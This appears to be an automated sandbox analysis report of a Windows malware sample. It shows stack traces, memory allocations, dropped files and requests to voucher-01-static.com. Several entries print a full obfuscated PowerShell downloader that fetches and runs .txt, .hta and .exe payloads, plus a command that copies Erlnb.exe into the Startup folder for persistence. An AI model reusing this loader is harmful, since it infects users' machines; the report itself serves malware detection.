system+0x18d1fe @ 0x6ecfd1fe
system+0x193c2f @ 0x6ed03c2f
system+0x19ac03 @ 0x6ed0ac03
system+0x19a884 @ 0x6ed0a884
system+0x19a79e @ 0x6ed0a79e
system+0x19a6b1 @ 0x6ed0a6b1
system+0x19a4bf @ 0x6ed0a4bf
system+0x198a79 @ 0x6ed08a79
system+0x19861c @ 0x6ed0861c
system+0x18d1fe @ 0x6ecfd1fe
system+0x193c2f @ 0x6ed03c2f
system+0x193b12 @ 0x6ed03b12
system+0x18fe09 @ 0x6ecffe09
system+0x18f8c7 @ 0x6ecff8c7
mscorlib+0x216e76 @ 0x71056e76
mscorlib+0x2202ff @ 0x710602ff
mscorlib+0x216df4 @ 0x71056df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x71941b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x71958dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x71966a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x71966a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x71966a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x719e3191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x7199192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x719918cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x719917f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x7199197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x719e2f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x719e303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x71aa805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 f4 44 86 ff 85 c0 74 21 c7 45 d4 02 00
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol: system+0x911edd
exception.address: 0x6acc1edd
registers.esp: 102625660
registers.edi: 0
registers.eax: 62882692
registers.ebp: 102625712
registers.edx: 49062080
registers.ebx: 47267460
registers.esi: 65383724
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://voucher-01-static.com/kvro/1337x.txt
suspicious_features	GET method with no useragent header	suspicious_request	GET http://voucher-01-static.com/kvro/xplayd.hta
suspicious_features	GET method with no useragent header	suspicious_request	GET http://voucher-01-static.com/kvro/Erlnb.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://voucher-01-static.com/rkei/1085.txt

Performs some HTTP requests (4 events)

request	GET http://voucher-01-static.com/kvro/1337x.txt
request	GET http://voucher-01-static.com/kvro/xplayd.hta
request	GET http://voucher-01-static.com/kvro/Erlnb.exe
request	GET http://voucher-01-static.com/rkei/1085.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 575 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70731000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70732000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02911000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02912000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\Erlnb.exe
file	c:\Users\test22\AppData\Local\Temp\jdaqmeqs.dll
file	C:\Users\Public\RoLg.ps1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	powershell.exe -ExecutionPolicy UnRestricted -File C:\Users\Public\RoLg.ps1
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)};function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,37636))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};function LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLHq.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=37528;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xhXqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37577,37579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt';kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37648,37640,37636,37625,37649,37628,37574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqdxl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRYp = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT;
cmdline	"C:\Windows\SysWOW64\mshta.exe" "C:\Users\test22\AppData\Roaming\xplayd.hta"
cmdline	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\test22\AppData\Roaming\Erlnb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Erlnb.exe' -Force
cmdline	powershell.exe -ExecutionPolicy UnRestricted function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)};function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,37636))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};function LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLHq.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=37528;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xhXqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37577,37579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt';kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37648,37640,37636,37625,37649,37628,37574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqdxl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRYp = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -File C:\Users\Public\RoLg.ps1

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\jdaqmeqs.dll
file	C:\Users\test22\AppData\Roaming\Erlnb.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 8, 2024, 6:25 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)};function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,37636))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};function LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLHq.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=37528;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xhXqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37577,37579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt';kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37648,37640,37636,37625,37649,37628,37574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqdxl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRYp = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT; filepath: powershell.exe	1	1
ShellExecuteExW July 8, 2024, 6:25 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted -File C:\Users\Public\RoLg.ps1 filepath: powershell.exe	1	1
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2540 thread_handle: 0x00000440 process_identifier: 2544 current_directory: C:\Users\test22\AppData\Roaming filepath: track: 1 command_line: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\test22\AppData\Roaming\Erlnb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Erlnb.exe' -Force filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000444	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 8, 2024, 6:25 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (5 events)

Data received	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 09:25:20 GMT Content-Type: text/plain Content-Length: 8701 Last-Modified: Tue, 02 Apr 2024 03:10:06 GMT Connection: keep-alive ETag: "660b770e-21fd" Accept-Ranges: bytes ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ âââ âââ ââââââââââ âââââââ âââââââââââ âââ ââââââ ââââââââ ââââââââââââââââââââââââââââââââââââ ââââââ ââââââââ ââââ âââââââ âââââââ ââââ ââââââ ââââââ ââââââââ âââ âââââââ âââââââ ââââ ââââââ ââââââ ââââââââ 